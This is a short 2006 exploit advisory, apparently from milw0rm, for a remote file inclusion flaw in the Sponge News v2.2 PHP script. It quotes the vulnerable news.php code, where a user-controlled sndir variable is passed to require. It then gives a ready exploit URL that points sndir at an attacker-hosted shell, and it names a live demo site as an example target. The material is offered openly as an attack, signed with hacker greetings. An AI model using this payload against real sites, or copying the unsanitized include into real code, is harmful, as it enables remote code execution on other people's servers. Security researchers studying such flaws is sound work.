Sponge News <= v2.2 (sndir) Remote File Inclusion Exploit

2006-09-06T00:00:00
ID SECURITYVULNS:DOC:14161
Type securityvulns
Reporter Securityvulns
Modified 2006-09-06T00:00:00

Description

==============================================================================================

Sponge News <= v2.2 (sndir) Remote File Inclusion Exploit

===============================================================================================

Critical Level : Dangerous

Venedor site : http://rickeeweb.free.fr/spongeweb/

Version : v2.2

================================================================================================

Bug in : news.php

Vlu Code :

--------------------------------

# Les variables utiles

$newsdir = "news/";

$commentdir = "comments/";

$snversion = "2.2";

$lastmodif = "Decembre 2002";

$scriptdir = $sndir;

$page = $current;

require $scriptdir."config.php";

================================================================================================

Exploit :

--------------------------------

http://sitename.com/[Script Path]/news.php?sndir=http://SHELLURL.COM?

Example :

http://rickeeweb.free.fr/sndemo/

================================================================================================

Discoverd By : SHiKaA

Conatact : SHiKaA-[at]hotmail.com

GreetZ : SiMooooo KACPER Rgod Timq XoRon MDX Bl@Ck^B1rd

Special Thx To : Str0ke

==================================================================================================

milw0rm.com [2006-09-05]